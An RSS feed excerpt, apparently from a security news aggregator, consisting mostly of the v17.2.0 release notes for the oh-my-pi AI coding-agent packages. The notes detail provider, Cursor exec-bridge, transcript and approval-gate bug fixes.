<link>https://tsecurity.de/de/3698496/windows-tipps/a-cheap-ergonomic-mouse-just-showed-me-what-the-mx-vertical-has-been-missing-all-along-and-exposed-its-biggest-flaw/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3698496/windows-tipps/a-cheap-ergonomic-mouse-just-showed-me-what-the-mx-vertical-has-been-missing-all-along-and-exposed-its-biggest-flaw/</guid>
<pubDate>Mon, 03 Aug 2026 00:10:24 +0200</pubDate>
<content:encoded><![CDATA[The ProtoArc EM11 Pro nails horizontal scrolling and quiet clicking, but its awkward grip keeps the Logitech MX Vertical on my desk.]]></content:encoded>
</item>
<item>
<title><![CDATA[GitHub: v17.2.0]]></title>
<description><![CDATA[@oh-my-pi/pi-agent-core
Fixed

Provider-native compaction failures now surface their transport error instead of silently switching to generic summarization; streaming V2 still falls back to native V1 when available.

@oh-my-pi/pi-ai
Added

Added first-class parentTurnId support for nested Codex r...]]></description>
<link>https://tsecurity.de/de/3698416/tools/github-v1720/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3698416/tools/github-v1720/</guid>
<pubDate>Mon, 03 Aug 2026 00:10:19 +0200</pubDate>
<content:encoded><![CDATA[<div class="github-feed-entry"><h2>@oh-my-pi/pi-agent-core</h2>
<h3>Fixed</h3>
<ul>
<li>Provider-native compaction failures now surface their transport error instead of silently switching to generic summarization; streaming V2 still falls back to native V1 when available.</li>
</ul>
<h2>@oh-my-pi/pi-ai</h2>
<h3>Added</h3>
<ul>
<li>Added first-class parentTurnId support for nested Codex requests, allowing stream options and metadata helpers to accept and safely propagate the initiating turn's ID.</li>
<li>Added preservation of the Codex <code>encrypted_function_args</code> plaintext-collaboration marker on replayed function calls, keeping server-marked plaintext tool arguments from being reinterpreted as encrypted on subsequent turns.</li>
<li>Added interactive Exa API-key login through <code>/login exa</code>, opening the official API-key dashboard and saving pasted keys to the credential store (<a href="https://github.com/can1357/oh-my-pi/issues/1798" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1798/hovercard">#1798</a>).</li>
<li>Cursor's modern exec wire protocol is now handled end to end. <code>agent.proto</code> models the frames current Cursor CLI builds emit — the seven Pi tools (<code>ExecServerMessage</code> 45-51), hooks, subagents, allowlist prechecks, MCP state, smart-mode classification, canvas diagnostics, conversation search, agent-store conflicts and git diff — and every one of them gets a typed answer. The Pi frames run their local equivalents (<code>read</code>/<code>bash</code>/<code>edit</code>/<code>write</code>/<code>grep</code>/<code>glob</code>); the rest answer with the error, not-found or empty-but-valid variant that is actually true of this client. Frames this build cannot name at all now raise <code>ExecClientControlMessage.throw</code> with <code>unknown_exec_variant</code>, and recognised frames with no truthful answer (<code>git_diff_request</code>, whose <code>GetDiffResponse</code> has no error variant) raise <code>exec_variant_unsupported</code>, instead of a silent ack that leaves the server waiting.</li>
<li><code>lsp</code> is advertised in the MCP tool catalog again. It was filtered out as a Cursor-native tool, but the native <code>diagnostics</code> frame covers one of roughly ten LSP actions, so the other nine were unreachable.</li>
<li>Added <code>pinSessionOAuthAccount</code> support for backdating the sticky's last-use timestamp (<code>options.lastUsedAtMs</code>), so pins restored from persisted sessions keep the provider's warm-window semantics: resumes inside the prompt-cache TTL reuse the account, stale resumes still re-rank.</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Codex turn metadata now reserves the codex-rs <code>code_mode_tool_names</code> key, preventing caller-supplied client metadata extras from colliding with the core-owned field.</li>
<li>Codex SSE requests to the official endpoint now use zstd-compressed bodies by default to match the official client, which can be disabled with PI_CODEX_ZSTD=0.</li>
<li>API-key validation now preserves provider HTTP status and retry headers, allowing authentication, rate-limit, and server failures to retain their original error classifications.</li>
<li>The Cursor Pi arg translation (<code>piReadPath</code>, <code>piJoinPath</code>, <code>piLsPath</code>, <code>piEscapeRegexLiteral</code>, <code>piLimit</code>) moved to <code>providers/cursor-pi-args</code>, re-exported from <code>providers/cursor/exec-modern</code> so existing imports are unaffected. The legacy pi shim shares these helpers and is compiled into the bundled virtual module registry, where a nested <code>providers/&lt;dir&gt;/&lt;mod&gt;</code> specifier is unresolvable under bunfs — and importing them from the exec module would drag the whole protobuf graph in for two string functions.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed Novita login rejecting valid API keys belonging to Developer and Basic team members by validating against the chat completions endpoint instead of the billing balance endpoint.</li>
<li>Fixed Cursor resource_exhausted errors being incorrectly classified as QUOTA_EXHAUSTED (which caused 30-minute credential blocks), mapping them to MODEL_CAPACITY_EXHAUSTED with a shorter backoff instead.</li>
<li>Fixed a crash in Amazon Bedrock and Devin providers when Context.systemPrompt is passed as a bare string.</li>
<li>Fixed aborted usage-limit recovery incorrectly blocking credentials or waiting on local usage fetches after the session had already changed.</li>
<li>Fixed Codex WebSocket sessions echoing stale or missing turn states by capturing x-codex-turn-state refreshes from response metadata event headers.</li>
<li>Fixed Harmony-dialect models (e.g., gpt-5.x, openai-codex) failing with invalid_prompt or "Request blocked" errors by escaping reserved control tokens in untrusted user and tool-result text.</li>
<li>Fixed named forced tool_choice not being enforced on string-only OpenAI-compatible hosts (such as llama.cpp and LM Studio) by narrowing the advertised tools to the forced tool.</li>
<li>Fixed direct Anthropic Claude Opus requests failing with HTTP 400 when the endpoint rejects strict tool fields.</li>
<li>Fixed usage-based credential ranking for Anthropic accounts where a missing long-window (7-day) metric was incorrectly treated as a short-window metric.</li>
<li>Fixed legacy Codex usage blocks continuing to gate all models after per-meter backoff was introduced, splitting the old shared scope into independent chat and spark blocks while maintaining backward compatibility with older clients and database schemas.</li>
<li>Fixed Anthropic retry loops ignoring <code>maxRetryDelayMs</code> for long server <code>retry-after</code> hints, so over-budget delays surface immediately without losing response details or abort cleanup (<a href="https://github.com/can1357/oh-my-pi/issues/7003" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/7003/hovercard">#7003</a>).</li>
<li>Added interactive xAI API-key login with key validation through the xAI models endpoint.</li>
<li>Fixed Google Gemini and Vertex tool declarations carrying numeric, boolean, object-valued, or mixed <code>enum</code> arrays that the Google Schema wire type cannot represent. Unsupported enums are omitted while valid string enums remain constrained.</li>
<li>Umans usage provider: fetches <code>GET /v1/usage</code> and surfaces the rolling 5h request window + concurrency limits in <code>/usage</code>, <code>omp usage</code>, and the TUI status bar.</li>
<li>Fixed ranged legacy Cursor reads reporting the returned window byte length as the full file size.</li>
<li>Updated the Cursor client build advertisement to activate the modern exec-frame protocol handled by this provider.</li>
<li>Fixed a windowed Cursor <code>read</code> reporting the window's line count as the file's. <code>total_lines</code> and <code>file_size</code> were derived from the payload, which is the whole file only for an unranged read — a 20-line page of a 100-line file answered <code>total_lines: 20</code>, which a paginating server reads as the end of the file. The count now comes from the read's own record of the file (<code>details.meta.truncation.totalLines</code>), falling back to counting the payload when the read returned the file whole.</li>
<li>Fixed a <code>pi_grep</code> that hit the native backend's internal match ceiling answering as an unqualified success. <code>GrepTool</code> folds that cap into the flat <code>details.truncated</code> alone, setting neither <code>details.truncation</code> nor <code>perFileLimitReached</code> — the two fields the Pi result was built from — so the one truncation a caller can neither detect nor page around was the one it was never told about. The flat flag is now translated into a <code>PiTruncation</code>, and only when no specific cap already reported itself.</li>
<li>Fixed a <code>pi_grep</code> frame's <code>context</code> and <code>limit</code> vanishing from the transcript. The bridge honors both by building a scoped <code>grep</code>, but neither is expressible in the model-facing schema, so the synthesized block recorded a plain pattern/path search — replaying a context-widened or capped search as an ordinary grep sitting beside output no ordinary grep produces. Both are now recorded on the block.</li>
<li>Fixed a Cursor MCP resource listing shrinking to a count in the transcript. The full URI/name/mime catalog goes out on the wire, but the paired local result recorded <code>Listed N MCP resource(s)</code> — and rebuilt history is serialized from that result, so one reload later the model knew it had seen N resources and could name none of them. The paired result now lists what the answer carried.</li>
<li>Fixed the <code>pi_read</code> range translation padding the slice it asks for. <code>piReadPath</code> composed a plain <code>:N+K</code> selector, which the local <code>read</code> tool expands by one leading and three trailing context line — so a frame naming offset 5/limit 20 received lines 4-27. Ranged Pi reads now compose <code>:raw:N+K</code>; the wire result is an opaque output string, so the line-number gutter <code>raw</code> also drops carries nothing the contract needs.</li>
<li>Fixed four Cursor exec frames answering with a result whose oneof was never set. In proto3 that is not an empty result — the server reads it as "the tool ran and produced nothing", indistinguishable from real success. <code>listMcpResourcesExecResult</code>, <code>readMcpResourceExecResult</code>, <code>recordScreenResult</code> and <code>computerUseResult</code> now send <code>ListMcpResourcesSuccess{resources: []}</code>, <code>ReadMcpResourceNotFound{uri}</code>, <code>RecordScreenFailure</code> and <code>ComputerUseError</code> respectively.</li>
<li>The MCP resource frames now answer from the host instead of a fixed verdict. <code>CursorExecHandlers</code> gained <code>listMcpResources</code>/<code>readMcpResource</code>, so a host holding live MCP connections advertises them; the empty catalog and <code>not_found</code> above remain the answer when no handler is supplied. A handler that throws surfaces as <code>ListMcpResourcesError</code>/<code>ReadMcpResourceError</code> rather than collapsing into "none exist", which the model cannot retry. A read carrying <code>download_path</code> forwards it and answers with <code>ReadMcpResourceSuccess.download_path</code> and no content, which is what that mode means.</li>
<li>Fixed Cursor <code>connect_scm</code> calls losing their repository and settling on a fabricated verdict. The target rides in the <code>ConnectScmArgs.target</code> oneof, so reading a flat <code>github</code> property always saw <code>undefined</code>; and the authoritative <code>success</code>/<code>error</code>/<code>rejected</code> result only arrives on the completion frame, so answering at the announcement persisted a fixed failure for every call — including the ones the server went on to accept. The block now opens on the start frame and settles from the completion's decoded result.</li>
<li>Fixed interleaved Cursor tool calls corrupting each other. The stream decoder tracked a single "current" block and settled it on any <code>toolCallCompleted</code>, ignoring the envelope's <code>call_id</code>: a completion for one call closed whichever block happened to be open and paired it with the wrong result, and <code>start A, start B</code> orphaned A entirely so its own completion settled B while A was never paired — which strips the whole interaction from every rebuilt transcript. Open blocks are now retained per envelope <code>call_id</code>, and end-of-stream closes all of them rather than only the last.</li>
<li>Fixed a Cursor <code>search_conversations</code> call leaving no transcript block. The frame is answered from a fixed verdict, so nothing downstream pairs a result for it, and an unpaired call takes its whole interaction out of every rebuilt transcript.</li>
<li>Fixed a Cursor <code>read_mcp_resource</code> call leaving no transcript block. The frame runs locally — and in download mode writes a workspace file — but synthesized no tool call and paired no result, so the read was invisible in the UI and absent from every rebuilt history; a resource download could mutate the workspace with nothing on record. The frame now synthesizes a <code>read_mcp_resource</code> block (not <code>read</code>: it is a remote MCP operation, and the name drives rendering and prune semantics) and pairs a result on success, not-found and error alike. Frames answered without a handler still synthesize nothing, since nothing ran.</li>
<li>Fixed a Cursor <code>list_mcp_resources</code> call leaving no transcript block. The model consumed the catalog, but the frame synthesized no tool call and paired no result — its streamed <code>ListMcpResourcesToolCall</code> announcement was equally unrecognized — so the listing was invisible in the UI and absent from every rebuilt history. Frames a handler answered now synthesize a <code>list_mcp_resources</code> block and pair a result derived from the same answer that went on the wire; frames answered from the fixed no-handler catalog still synthesize nothing, since nothing ran.</li>
<li>Fixed an unavailable <code>pi_edit</code>/<code>pi_write</code> answering with the error variant. Both results model refusal and failure as separate oneof cases, and a denial reported as <code>error</code> reads as "the tool ran and broke" — inviting a retry of an operation that was never permitted. A frame whose tool is not granted, or whose handler produced nothing, now answers with <code>PiEditExecRejected</code>/<code>PiWriteExecRejected</code>; execution failures keep the error variant.</li>
<li>Fixed a Cursor MCP approval probe actually running the tool. A modern <code>mcpArgs</code> frame carrying <code>smart_mode_approval_only</code> asks only whether a call would be permitted, not for the call itself. The decoder dropped the flag, so the frame ran a side-effecting MCP tool the user had not been asked about, then ran it again when the real call followed. The flag is now carried through and the probe is answered from the host's policy without executing: approved only for a definite allow, refused for a deny, for a mode that demands a prompt the frame cannot raise, and for a tool the session does not have. No transcript block is synthesized either, since nothing ran.</li>
<li>Fixed the Cursor stream's end-of-transport cleanup erasing the arguments of every block still open. Blocks whose args arrive whole (todo, connect-SCM, MCP) never feed the streamed partial-JSON buffer, and reparsing an absent buffer yields <code>{}</code>, so a truncated or disconnected turn rebuilt those calls with no arguments at all. Only blocks that actually streamed their args are reparsed now.</li>
<li>Fixed a Cursor stream dying mid-turn stranding the call it left open. <code>connect_scm</code> and native todo blocks are stamped resolved the moment they open, so the agent loop synthesizes no placeholder and only their completion frame pairs a result — a transport that closed first left the card animating and the call unpaired, which takes the whole interaction out of every rebuilt transcript. The terminal-error path now closes open blocks and pairs those server-owned calls with an interrupted result; the flush ran only on clean completion before, which is not the path a dying stream takes. Exec-settled MCP blocks are left alone, since the dispatch that ran them owns their result.</li>
<li>Fixed the Pi exec frames displaying a different operation than the one they run. The provider synthesized its transcript block from a second, hand-rolled translation of the frame args, so <code>pi_read</code>'s <code>offset</code>/<code>limit</code> were shown as a whole-file read, <code>pi_grep</code>'s <code>literal</code> pattern as an unescaped regex, and <code>pi_find</code>'s path/glob join differed from the executed one. Both sides now share a single translation.</li>
<li>Fixed the streamed <code>pi_*_tool_call</code> announcements that modern builds send alongside each exec frame being unrecognized. The exec channel already synthesizes those blocks when it runs the tool; the duplicate was avoided only because the decoder recognized none of the variants, which would have started double-rendering as soon as any one was added.</li>
<li>Fixed <code>pi_bash</code> results reaching Cursor clipped with no truncation notice. Two truncation records exist locally: <code>read</code>/<code>grep</code> set <code>details.truncation</code>, which carries an explicit <code>truncated</code> flag, while <code>bash</code> sets <code>details.meta.truncation</code>, whose record has no such flag — its presence is the signal. <code>piTruncation</code> read only the first shape and required the flag, so every real Bash truncation was dropped and the server was told the clipped output was complete. Both shapes now translate, and an explicit <code>truncated: false</code> still suppresses the field.</li>
</ul>
<h2>@oh-my-pi/pi-catalog</h2>
<h3>Added</h3>
<ul>
<li>Regenerated the Cursor agent protobufs (<code>discovery/cursor-gen/agent_pb.ts</code>) against the modern <code>agent.proto</code>, adding the message and enum families current Cursor CLI builds emit: Pi tool exec frames, hook queries and responses, subagents, allowlist prechecks, MCP state, smart-mode classification, canvas diagnostics, conversation search, agent-store conflicts and git diff. Purely additive — no existing exported symbol changed shape.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed an issue where LM Studio first turns failed with a 400 Invalid tool_choice error when a named tool was forced, by using the supported tool_choice: "required" string selector.</li>
</ul>
<h2>@oh-my-pi/pi-coding-agent</h2>
<h3>Breaking Changes</h3>
<ul>
<li>Removed the <code>DEL</code>, <code>DEL.BLK</code>, <code>COPY</code>, and <code>COPY.BLK</code> hashline edit operations. Use <code>CUT</code> / <code>CUT.BLK</code> for deletion; removed content remains available to <code>PASTE</code>.</li>
</ul>
<h3>Added</h3>
<ul>
<li>Added server-name autocomplete for <code>/mcp</code> commands (<code>enable</code>, <code>disable</code>, <code>test</code>, <code>remove</code>, <code>reconnect</code>, <code>reauth</code>, <code>unauth</code>) using configured and runtime-discovered MCP servers.</li>
<li>Added <code>CUT</code> and <code>PASTE</code> ops to the hashline edit tool for moving code without retyping it: <code>CUT N.=M</code> (and <code>.BLK</code> block forms) capture lines into a clipboard register, and <code>PASTE</code> operations insert them. The register flows across sections within a patch (cross-file moves) and persists across edit calls per session.</li>
<li>Added <code>--from-claude</code> and <code>--from-codex</code> session imports (including compaction state for Codex), also available from <code>/resume @claude</code> and <code>/resume @codex</code>.</li>
<li>Added interactive Exa API-key onboarding through <code>/login exa</code>, opening the official key dashboard and saving pasted keys for authenticated web search while preserving <code>EXA_API_KEY</code> and explicit-selection public MCP fallback behavior (<a href="https://github.com/can1357/oh-my-pi/issues/1798" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1798/hovercard">#1798</a>).</li>
<li>Added <code>ExtensionContext.getAsyncJobSnapshot()</code> so extensions can read the owning session's async-job state without relying on process-global job-manager identity</li>
<li>Added opt-in <code>tui.codexResetFireworks</code> celebrations for unscheduled Codex weekly usage resets and newly banked saved resets, shown in a theme-aware top-third modal until Escape (<a href="https://github.com/can1357/oh-my-pi/pull/6858" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/6858/hovercard">#6858</a> by <a href="https://github.com/joshrzemien">@joshrzemien</a>).</li>
<li>The Cursor exec bridge serves the seven modern Pi tool frames, mapping each to its local equivalent: <code>pi_read</code>/<code>pi_ls</code> → <code>read</code>, <code>pi_bash</code> → <code>bash</code>, <code>pi_edit</code> → <code>edit</code>, <code>pi_write</code> → <code>write</code>, <code>pi_grep</code> → <code>grep</code>, and <code>pi_find</code> → <code>glob</code>. The frames are a separate wire family from the legacy args, not aliases, so each mapping is a real translation — <code>pi_grep</code>'s <code>ignore_case</code> is the inverse of the local tool's case-sensitivity flag, <code>pi_find</code> searches filenames rather than contents, and <code>pi_edit</code>'s replacements are renamed to the local snake_case pairs.</li>
<li><code>providers.autoThinkingMaxEffort</code> (<code>xhigh</code> | <code>max</code>, default <code>xhigh</code>) raises the ceiling of the <code>auto</code> thinking classifier. <code>max</code> became a first-class effort tier after the classifier prompt was written, so <code>auto</code> could never reach it on models that expose the tier — only the <code>ultrathink</code> keyword could. Opting in adds <code>max</code> to the classifier's vocabulary, gated on the target model actually supporting it; the default keeps today's prompt byte-for-byte. The ceiling is enforced inside the effort clamp rather than on the classifier's answer, so a sparse ladder cannot snap an excluded request back up, and the Low floor is still resolved against the model's own ladder. The on-device 3-bucket classifier stays capped at <code>xhigh</code> regardless of the setting. The ceiling governs what <code>auto</code> resolves: a ladder with nothing underneath it yields no auto level, and a <code>thinking.requiresEffort</code> model still gets its lowest supported effort from the transport.</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Improved grouped read-call layout by nesting each request's usage metrics beneath its final path.</li>
<li>Improved turn recovery to prevent duplicate output streaming during credential rotation or model fallback when visible text has already been streamed.</li>
<li>Optimized tool guidance for bash, grep, and glob to be more concise while clarifying shell boundaries and search timeouts.</li>
<li>Optimized models configuration resource probing to run in a single child process, reducing startup contention.</li>
<li>Startup release notes now default to a compact change-count summary. Use <code>startup.changelogMode</code> (<code>summary</code> | <code>expanded</code> | <code>hidden</code>) to control them; legacy <code>collapseChangelog</code> choices migrate automatically (<a href="https://github.com/can1357/oh-my-pi/issues/6771" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/6771/hovercard">#6771</a>).</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed Anthropic prompt-cache cold misses on session resume with multiple OAuth accounts: the account that served a session is now recorded in the session file (as a <code>credential_pin</code> sha-256 of the account + org/project scope, so exports carry no plaintext identity) and re-pinned on resume with the session's effective last-use time, so a fresh process no longer re-ranks accounts by usage headroom — which systematically routed away from the just-used account and cold-missed the entire account-scoped cache prefix. Sticky routing was previously stored only in the auth store's KV cache, which is in-memory when a remote auth broker is configured.</li>
<li>Fixed Anthropic prompt-cache cold misses on session resume with multiple OAuth accounts: the account that served a session is now recorded in the session file (as a PII-free <code>credential_pin</code> hash) and re-pinned on resume, so a fresh process no longer re-ranks accounts by usage headroom — which systematically routed away from the just-used account and cold-missed the entire account-scoped cache prefix. Sticky routing was previously stored only in the auth store's KV cache, which is in-memory when a remote auth broker is configured.</li>
<li>Fixed concurrent <code>createAgentSession</code> calls with the default agent id failing initialization with <code>Agent "Main" was replaced during session initialization</code> — each in-process embedder (e.g. the edit benchmark runner) can now pass a private registry via the newly exported <code>AgentRegistry</code>, keeping every top-level session's "Main" out of the process-global roster race.</li>
<li>Fixed task tool blocks duplicating their per-agent progress rows into terminal scrollback on every update: live task frames now pin the transcript live region so mid-run rows are never recorded as frozen snapshots, and a detached background task freezes its progress the moment any of its rows commit to scrollback instead of mutating committed history.</li>
<li>Fixed Codex reset fireworks comparing different quota tiers or plans, preventing false celebrations when usage reports switch between Spark and base weekly limits.</li>
<li>Fixed Cursor ranged-read results losing the full file byte size after applying the requested window.</li>
<li>Fixed empty Codex final-stop recovery discarding an earlier commentary message when both messages shared response metadata.</li>
<li>Fixed Advisor availability with providers that refuse echoed reasoning by retrying once with primary thinking stripped and surfacing persistent refusals immediately.</li>
<li>Fixed <code>/tan</code> agents being unable to read parent-session <code>local://</code> attachments by correctly resolving local protocol options against the parent session's artifacts.</li>
<li>Fixed Codex web search silently returning plain completions when the hosted web search tool was skipped.</li>
<li>Fixed TUI collaboration guest loader not starting when joining or reconnecting mid-turn.</li>
<li>Fixed multi-second TUI freezes in reftable-format repositories by moving branch resolution off the render path and adding a timeout to synchronous git spawns.</li>
<li>Fixed <code>xd://</code> device summaries containing control characters and exceeding size budgets by stripping control characters and bounding summaries by UTF-8 bytes.</li>
<li>Fixed <code>task.softRequestBudget</code> configuration having no effect on bundled scout and sonic subagents.</li>
<li>Fixed quick LSP server exits being misreported as reader failures and resolved an issue where explicit reloads were blocked by initialization backoff.</li>
<li>Forced Git subprocesses to use the stable <code>C</code> locale to ensure predictable, non-interactive command output.</li>
<li>Fixed compatibility replay issues for pre-upgrade launch brokers evaluating xterm inside the client process.</li>
<li>Fixed Advisor cost tracking in the status line across conversation boundaries, ensuring session transitions, forks, and resumes correctly restore or isolate conversation spend.</li>
<li>Fixed validation failures for legacy extensions importing from the package root, which previously blocked installations.</li>
<li>Fixed ACP clients (such as Zed), TUI status lines, and collaboration guests not updating when model changes occur dynamically within the agent loop.</li>
<li>Fixed assistant-facing resource summaries omitting parameterized MCP resource templates, ensuring failed reads list templates alongside concrete resources.</li>
<li>Fixed redundant <code>xd://</code> mount notices and prompt-cache invalidation when resuming sessions or reconnecting devices.</li>
<li>Fixed the model picker displaying placeholder model lists instead of the actual credential-aware catalog resolved at registration.</li>
<li>Fixed file corruption and snapshot mismatches when writing files through the ACP client bridge by verifying the final on-disk content after client-side post-save formatting.</li>
<li>Fixed <code>omp ttsr test</code> silently evaluating source files as prose when their extensions were missing from the allowlist, and expanded the allowlist to support .NET, Shell, SQL, Zig, Dart, Scala, Elixir, and Protobuf files.</li>
<li>Fixed automatic light/dark theme switching in direct WezTerm sessions on macOS when DEC Mode 2031 is unsupported, and improved theme-change color responsiveness.</li>
<li>Fixed configured <code>retry.maxDelayMs</code> not being forwarded into Anthropic retry handling, so over-budget server retry delays fail fast.</li>
<li>Added tokens-per-second throughput to RPC <code>get_state</code> responses for non-TUI clients.</li>
<li>Added the RPC <code>set_fast_mode</code> command and typed TypeScript/Python client methods for live fast-mode control.</li>
<li>Added <code>fastModeEnabled</code> and <code>fastModeActive</code> to RPC <code>get_state</code> responses.</li>
<li>Fixed RPC fast-mode state reporting after direct Anthropic rejects <code>speed: "fast"</code>, while allowing explicit re-enable requests to retry priority service.</li>
<li>Added opt-in subagent access to <code>checkpoint</code>, <code>rewind</code>, <code>learn</code>, and <code>manage_skill</code> when explicitly listed in an agent definition's <code>tools:</code> frontmatter. Listing one of <code>checkpoint</code>/<code>rewind</code> auto-includes the other. Settings (<code>checkpoint.enabled</code>, <code>autolearn.enabled</code>) remain master toggles.</li>
<li>Added a <code>browser.cdpUrl</code> setting that points browser automation at an already-running CDP endpoint by default, so <code>app.cdp_url</code> no longer has to be repeated on every call. Explicit <code>app</code> options still take precedence.</li>
<li>Native compaction preserves provider-native success and non-authentication failure semantics while retaining authenticated cross-provider fallback when the native provider rejects credentials.</li>
<li>Fixed the Cursor Pi exec bridge silently dropping frame arguments. <code>pi_read</code>'s <code>offset</code>/<code>limit</code> were ignored, so a ranged read returned the whole file; <code>pi_grep</code>'s <code>literal</code> was ignored, so a fixed-string search ran as a regex and matched the wrong lines; and the path/glob join produced a <code>./</code>-prefixed spec. Ranges are now composed onto <code>read</code>'s <code>:N+K</code> inline selector, literal patterns are escaped, and the join uses <code>node:path</code>. These are <code>optional int32</code> fields, so a present <code>0</code> is honored rather than folded into a default: <code>pi_read</code> with <code>limit: 0</code> answers with empty output instead of the entire file, and <code>pi_find</code> with <code>limit: 0</code> clamps to 1 the way the reference client does.</li>
<li><code>pi_grep</code>'s <code>context</code> and <code>limit</code> are honored. Neither is expressible in the model-facing <code>grep</code> schema — context width comes from <code>grep.contextBefore</code>/<code>grep.contextAfter</code> fixed at tool construction — so the bridge builds a per-call <code>grep</code> for frames that supply them. <code>GrepTool</code> accepts these as constructor options; the model-facing schema is unchanged, and a frame that supplies neither keeps the shared instance and the session's defaults.</li>
<li><code>pi_ls</code>'s <code>limit</code> is still not mapped, now deliberately: it caps directory <em>entries</em>, while the local <code>read</code> tool renders a depth-2 tree with per-directory caps and elision rows and applies a selector as a <em>rendered line</em> slice. Mapping it to <code>:1+K</code> would cap a different unit while appearing honored.</li>
<li>The legacy pi shim's regex-literal escaper and path/glob join were verbatim copies of the modern bridge's. Both paths now call the shared helpers, so the two Pi translations cannot drift.</li>
<li>Fixed every Cursor <code>pi_edit</code> frame failing instead of editing. Two independent causes: the session drops <code>edit</code> from the tool registry for Cursor so the model uses full-file <code>write</code>, but that registry is also the exec bridge's tool source, so the native frame — which the server sends regardless of the advertised catalog — found no tool; and the retained instance followed the session's configured edit mode, while <code>PiEditExecArgs</code> carries <code>old_text</code>/<code>new_text</code> pairs that only <code>replace</code> accepts (the default <code>hashline</code> takes a single <code>input</code> string). The bridge now resolves a <code>replace</code>-mode instance through its fallback resolver, still wrapped for approval.</li>
<li>Fixed a <code>pi_grep</code> frame carrying <code>context</code> or <code>limit</code> escaping the approval gate. Honoring those fields needs a per-call <code>grep</code>, and the per-call instance was built raw while every registry tool is wrapped, so such calls bypassed <code>tools.approval.grep</code> and the exec-tier check for SSH-targeted paths. Both bridge callsites now build it through one shared factory that applies the same wrapper.</li>
<li>Fixed Cursor advisors ignoring <code>pi_grep</code>'s <code>context</code> and <code>limit</code>. Only the primary session supplied the per-call <code>grep</code> factory, so advisor frames silently fell back to session defaults. Advisors now receive the same factory, gated on the advisor actually having been granted <code>grep</code>.</li>
<li>Fixed Cursor advisors failing every <code>pi_edit</code>. The advisor roster handed the bridge the <code>edit</code> instance built for the advisor's own loop, which follows the configured <code>edit.mode</code> (<code>hashline</code> by default) and rejects the frame's <code>old_text</code>/<code>new_text</code> pairs — the same mode mismatch the primary bridge already fixed, on the path it missed. The exec map now substitutes a <code>replace</code>-mode instance, gated on the advisor actually having been granted <code>edit</code>, while the advisor's own loop keeps the tool it was given.</li>
<li>Fixed <code>pi_bash</code> killing commands that explicitly asked for no deadline. <code>timeout</code> is <code>optional int32</code> and <code>bash</code> documents <code>0</code> as "disables the command deadline", but a truthiness check folded a supplied <code>0</code> into unset, applying the 300s default instead. A present <code>0</code> now passes through; negatives, which have no local meaning and would otherwise clamp to the 1s floor, still fall back to the default.</li>
<li>Fixed the Cursor exec bridge granting <code>edit</code> and <code>grep</code> to sessions that withheld them. Both bridge-only tools are constructed rather than looked up, and <code>executeTool</code> prefers a constructed override over the registry, so a restricted tool set (<code>toolNames</code> without them, or <code>restrictToolNames</code>) still got a working <code>pi_edit</code>/<code>pi_grep</code> — native frames arrive regardless of the advertised catalog. Both are now gated on the session having actually granted the tool, matching the <code>delete</code> frame's existing check (issue <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4900597280" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/5680" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/5680/hovercard" href="https://github.com/can1357/oh-my-pi/issues/5680">#5680</a>).</li>
<li>Fixed Cursor advisor bridge tools bypassing approval settings. The advisor's <code>pi_edit</code>/<code>pi_grep</code> instances are approval-wrapped, but the wrapper reads <code>tools.approvalMode</code>, per-tool <code>tools.approval.&lt;tool&gt;</code> policies and <code>autoApprove</code> only from the execute-time tool context — which the advisor bridge never supplied, so every native advisor frame resolved as <code>yolo</code> with empty policies and ran past a configured <code>ask</code> or <code>deny</code>. Advisors now receive the same context store as the primary bridge.</li>
<li>Fixed Cursor's <code>list_mcp_resources</code>/<code>read_mcp_resource</code> frames answering as though the client hosted no MCP servers. The bridge hardcoded an empty catalog and <code>not_found</code>, so resources from servers the session held live connections to were invisible to the model even while the same session read them through <code>mcp://</code>. Both frames now answer from the session's <code>MCPManager</code> — awaiting a server's background resource discovery rather than reading the not-yet-populated cache and reporting "advertises nothing" — and a lookup failure surfaces as an error rather than an empty catalog, which would read as "asked, none exist". A read carrying <code>download_path</code> writes the resource to that path and answers with the path alone, per the wire contract, instead of putting the payload back in the model's context. That path arrives from the server while the general-purpose resolver deliberately honors absolute paths and <code>..</code>, so downloads are confined to the workspace: the resolved target and its deepest existing ancestor must stay inside it, and a target that is itself a symlink is refused. The write then opens <code>O_NOFOLLOW</code> and refuses a non-regular or hard-linked file before truncating, so the final component cannot be swapped for a link or an inode shared outside after the check. A parent directory replaced by a symlink mid-write is still followed; closing that needs <code>openat</code>/dirfd walking, which this does not attempt.</li>
<li>Fixed the Cursor native <code>delete</code> frame bypassing approval settings. Unlike every other frame it removes the file directly instead of running a registry tool, so no approval wrapper sat in front of it — the bridge's <code>allowDirectFileMutation</code> grant answers whether a mutating tool was granted, which is a different question from whether the user's policy allows the call. A configured <code>tools.approval.delete: deny</code>, or an <code>always-ask</code> session that this channel cannot prompt in, now refuses the frame and keeps the file.</li>
<li>Fixed Cursor download-mode resource reads bypassing the session's mutation restrictions. A <code>read_mcp_resource</code> frame carrying <code>download_path</code> creates and overwrites workspace files without running a registry tool — the same hole the native <code>delete</code> frame had — so a session that withheld <code>write</code>/<code>edit</code>, or one whose <code>write</code> tier is <code>deny</code>/<code>always-ask</code>, still had files written. Both frames now share one grant (<code>allowDirectFileMutation</code>, renamed from <code>allowNativeDelete</code> now that it gates more than deletion) and one <code>write</code>-tier policy check, and the download refuses before the read so a blocked call does not fetch the resource either. The primary session derives that grant before it rewrites its registry: Cursor moves <code>edit</code> out of the tool map and <code>write</code> may be auto-registered later, so reading the map at bridge-construction time would have misjudged both.</li>
